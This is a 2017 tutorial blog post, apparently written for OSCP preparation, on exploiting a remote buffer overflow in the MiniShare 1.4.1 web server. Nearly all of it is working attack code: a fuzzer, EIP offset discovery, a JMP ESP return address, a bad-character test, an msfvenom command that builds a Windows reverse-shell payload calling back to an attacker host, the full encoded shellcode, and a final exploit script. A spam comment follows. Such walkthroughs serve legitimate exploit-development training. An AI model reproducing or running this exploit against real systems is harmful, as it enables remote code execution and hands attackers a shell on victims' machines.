Saturday, November 11, 2017

MiniShare 1.4.1 - Remote buffer overflow exploitation

In this blog post, I will describe the exploitation process of a buffer overflow vulnerability in MiniShare 1.4.1 using the Immunity Debugger and the tools that come out of the box in Kali. We can find MiniShare 1.4.1 here.

Vulnerability identification

First step is to identify the vulnerable input to the app, we can script the following fuzzer that sends bigger strings to the URL of the request until the application crashes:
import socket
# Create an array of buffers, from 10 to 2000, with increments of 20.
counter = 100
buffer = ["A"]

while len(buffer) <= 60:
    buffer.append("A" * counter)
    counter = counter + 200

for string in buffer:
    print "Fuzzing with %s bytes" % len(string)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect(('192.168.0.9', 80))
    #s.recv(1024)
    s.send('GET ' + string+'\r\n\r\n')
    print s.recv(1024)
    s.close()
We fuzz the app and debug it:
The app crashes when sending a string 1900 long, so we know the buffer is somewhere between 1700 and 1900.


Buffer size identification

Second step is to find the exact size of the buffer before the EIP register. We can achieve this by generating a string with unique sequence of characters and use the debugger to find the value that overwrites the EIP register. We create the string as follows:

root@kali:~/oscp/bo_miniserver# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1900
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2C

We add the string to the previous script:
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer='Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2C'
try:
    print "\nSending evil buffer..."
    s.connect(('192.168.0.9', 80))
    s.send('GET ' + buffer + 'HTTP/1.1\r\n\r\n')
    print s.recv(1024)
    print "\nDone!."
except:
    print "Could not connect"

We run the script and debug MiniShare:
We can see in the previous image the EIP was overwritten with 36684335, we can search the exact length using:

root@kali:~/oscp/bo_miniserver# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1900 -q 36684335
[*] Exact match at offset 1787

So we know the size of the buffer before the EIP register is 1787.


Finding an insecure JMP to ESP

Our objective is to inject a shellcode in beginning of the stack, replace the EIP with the address of the ESP and get the execution flow redirected to our shellcode.

The problem is that the amount of data loaded in the stack changes at every execution, so we can not predict the value of the ESP address. We can work around this by finding a JMP ESP instruction in memory from a module that has no DES or ASLR, and change our EIP to point to that address.
root@kali:~/oscp/bo_miniserver# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000  FFE4              jmp esp

We can now search the instruction \xff\xe4 using mona in Immunity Debugger by running:

!mona find -s '\xff\xe4'

We identify multiple valid instructions:
We find the address 77EF6E7E, since x86 is little endian, to have it properly read from the stack we need to encode it as \x7E\x6E\xEF\x77.

We will add our shellcode after the JMP ESP instruction (of about 400 bytes), so our payload will look like this:

Padding + JMP ESP + shellcode

Using the previous buffer size and address:
 "A" * 1787 + "\x7E\x6E\xEF\x77" + "C" * 400 

We update the previous exploit with the JMP ESP address:
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "A" * 1787 + "\x7E\x6E\xEF\x77" + "C" * 400 
try:
    print "\nSending evil buffer..."
    s.connect(('192.168.0.9', 80))
    s.send('GET ' + buffer + '\r\n\r\n')
    print s.recv(1024)
    print "\nDone!."
except:
    print "Could not connect"

We will set a breakpoint to that memory location 77EF6E7E and run the new exploit. We go to CPU view, right click, go to, expression and the address. Press F2 in ImmunityDebugger to set the breakpoint, the debugger should pause when sending the payload, and stepping into the next instruction (F7) should jump to a the top of the stack, where there should be 400 C. If there are less 'C', then the input has been truncated and you will probably need a bigger buffer to fit your shellcode.
The stack looks exactly as it should, the execution flow is redirected to the begining of our 'C' buffer, where we will place the shellcode.


Finding illegal characters

 Next step is to generate a shellcode. Before doing that, we need to know what characters the application allows. We will send a buffer that contains all the ASCII characters:
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
buffer = "A" * 1787 + "B" * 4 + badchars
try:
    print "\nSending evil buffer..."
    s.connect(('192.168.0.9', 80))
    s.send('GET ' + buffer + '\r\n\r\n')
    print s.recv(1024)
    s.close()
    print "\nDone!"
except:
    print "Could not connect"

We run it, right click in the ESP address, and follow in dump to find potential bad characters that the application truncates


We find the first character that truncates the input \x0d, we remove it from our PoC and run it again until all the sent characters are shown. We identified \x00 and \x0d.

Generating a shellcode and exploiting

There are multiple utils in Kali to generate shellcodes, we decide to build a windows reverse shell  using msfvenom:
root@kali:~/oscp/bo_miniserver# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.4 LPORT=443 -f  c –e x86/shikata_ga_nai -b "\x00\x0d"
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] = 
"\xbf\x09\x50\xa4\x04\xdb\xd3\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x52\x31\x7e\x12\x83\xc6\x04\x03\x77\x5e\x46\xf1\x7b\xb6\x04"
"\xfa\x83\x47\x69\x72\x66\x76\xa9\xe0\xe3\x29\x19\x62\xa1\xc5"
"\xd2\x26\x51\x5d\x96\xee\x56\xd6\x1d\xc9\x59\xe7\x0e\x29\xf8"
"\x6b\x4d\x7e\xda\x52\x9e\x73\x1b\x92\xc3\x7e\x49\x4b\x8f\x2d"
"\x7d\xf8\xc5\xed\xf6\xb2\xc8\x75\xeb\x03\xea\x54\xba\x18\xb5"
"\x76\x3d\xcc\xcd\x3e\x25\x11\xeb\x89\xde\xe1\x87\x0b\x36\x38"
"\x67\xa7\x77\xf4\x9a\xb9\xb0\x33\x45\xcc\xc8\x47\xf8\xd7\x0f"
"\x35\x26\x5d\x8b\x9d\xad\xc5\x77\x1f\x61\x93\xfc\x13\xce\xd7"
"\x5a\x30\xd1\x34\xd1\x4c\x5a\xbb\x35\xc5\x18\x98\x91\x8d\xfb"
"\x81\x80\x6b\xad\xbe\xd2\xd3\x12\x1b\x99\xfe\x47\x16\xc0\x96"
"\xa4\x1b\xfa\x66\xa3\x2c\x89\x54\x6c\x87\x05\xd5\xe5\x01\xd2"
"\x1a\xdc\xf6\x4c\xe5\xdf\x06\x45\x22\x8b\x56\xfd\x83\xb4\x3c"
"\xfd\x2c\x61\x92\xad\x82\xda\x53\x1d\x63\x8b\x3b\x77\x6c\xf4"
"\x5c\x78\xa6\x9d\xf7\x83\x21\x62\xaf\x8b\xb5\x0a\xb2\x8b\xb4"
"\x71\x3b\x6d\xdc\x95\x6a\x26\x49\x0f\x37\xbc\xe8\xd0\xed\xb9"
"\x2b\x5a\x02\x3e\xe5\xab\x6f\x2c\x92\x5b\x3a\x0e\x35\x63\x90"
"\x26\xd9\xf6\x7f\xb6\x94\xea\xd7\xe1\xf1\xdd\x21\x67\xec\x44"
"\x98\x95\xed\x11\xe3\x1d\x2a\xe2\xea\x9c\xbf\x5e\xc9\x8e\x79"
"\x5e\x55\xfa\xd5\x09\x03\x54\x90\xe3\xe5\x0e\x4a\x5f\xac\xc6"
"\x0b\x93\x6f\x90\x13\xfe\x19\x7c\xa5\x57\x5c\x83\x0a\x30\x68"
"\xfc\x76\xa0\x97\xd7\x32\xd0\xdd\x75\x12\x79\xb8\xec\x26\xe4"
"\x3b\xdb\x65\x11\xb8\xe9\x15\xe6\xa0\x98\x10\xa2\x66\x71\x69"
"\xbb\x02\x75\xde\xbc\x06";

Note that we passed the illegal characters as a parameter.

The shellcode needs to be decoded in memory, which means we need extra space in the stack. We can achieve this by adding some NOPs before the shellcode, so our buffer looks like this:
"A" * 1787 + "\x7E\x6E\xEF\x77" + "\x90" * 8 + shellcode

We add the shellcode to the previous Poc:
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shellcode = (
"\xbf\x09\x50\xa4\x04\xdb\xd3\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x52\x31\x7e\x12\x83\xc6\x04\x03\x77\x5e\x46\xf1\x7b\xb6\x04"
"\xfa\x83\x47\x69\x72\x66\x76\xa9\xe0\xe3\x29\x19\x62\xa1\xc5"
"\xd2\x26\x51\x5d\x96\xee\x56\xd6\x1d\xc9\x59\xe7\x0e\x29\xf8"
"\x6b\x4d\x7e\xda\x52\x9e\x73\x1b\x92\xc3\x7e\x49\x4b\x8f\x2d"
"\x7d\xf8\xc5\xed\xf6\xb2\xc8\x75\xeb\x03\xea\x54\xba\x18\xb5"
"\x76\x3d\xcc\xcd\x3e\x25\x11\xeb\x89\xde\xe1\x87\x0b\x36\x38"
"\x67\xa7\x77\xf4\x9a\xb9\xb0\x33\x45\xcc\xc8\x47\xf8\xd7\x0f"
"\x35\x26\x5d\x8b\x9d\xad\xc5\x77\x1f\x61\x93\xfc\x13\xce\xd7"
"\x5a\x30\xd1\x34\xd1\x4c\x5a\xbb\x35\xc5\x18\x98\x91\x8d\xfb"
"\x81\x80\x6b\xad\xbe\xd2\xd3\x12\x1b\x99\xfe\x47\x16\xc0\x96"
"\xa4\x1b\xfa\x66\xa3\x2c\x89\x54\x6c\x87\x05\xd5\xe5\x01\xd2"
"\x1a\xdc\xf6\x4c\xe5\xdf\x06\x45\x22\x8b\x56\xfd\x83\xb4\x3c"
"\xfd\x2c\x61\x92\xad\x82\xda\x53\x1d\x63\x8b\x3b\x77\x6c\xf4"
"\x5c\x78\xa6\x9d\xf7\x83\x21\x62\xaf\x8b\xb5\x0a\xb2\x8b\xb4"
"\x71\x3b\x6d\xdc\x95\x6a\x26\x49\x0f\x37\xbc\xe8\xd0\xed\xb9"
"\x2b\x5a\x02\x3e\xe5\xab\x6f\x2c\x92\x5b\x3a\x0e\x35\x63\x90"
"\x26\xd9\xf6\x7f\xb6\x94\xea\xd7\xe1\xf1\xdd\x21\x67\xec\x44"
"\x98\x95\xed\x11\xe3\x1d\x2a\xe2\xea\x9c\xbf\x5e\xc9\x8e\x79"
"\x5e\x55\xfa\xd5\x09\x03\x54\x90\xe3\xe5\x0e\x4a\x5f\xac\xc6"
"\x0b\x93\x6f\x90\x13\xfe\x19\x7c\xa5\x57\x5c\x83\x0a\x30\x68"
"\xfc\x76\xa0\x97\xd7\x32\xd0\xdd\x75\x12\x79\xb8\xec\x26\xe4"
"\x3b\xdb\x65\x11\xb8\xe9\x15\xe6\xa0\x98\x10\xa2\x66\x71\x69"
"\xbb\x02\x75\xde\xbc\x06"
)
buffer = "A" * 1787 + "\x7E\x6E\xEF\x77" + "\x90" * 8 + shellcode
try:
    print "\nSending evil buffer..."
    s.connect(('192.168.0.9', 80))
    s.send('GET ' + buffer + '\r\n\r\n')
    print s.recv(1024)
    print "\nDone!."
except:
    print "Could not connect"

We run netcat to capture the reverse shell, trigger the exploit and get a shell.


If it had not worked, we could debug the memory address 77EF6E7E to identify potential problems with our shellcode.

1 comment:

  1. Thanks it was userful. I often read about buffer overflow on Instagram, and noticed that many posts are posted by accounts that have more than 89 thousand of followers! I am sure that in order to achieve such indicators, their owners buy instagram followers and quickly wound up such a quantity.

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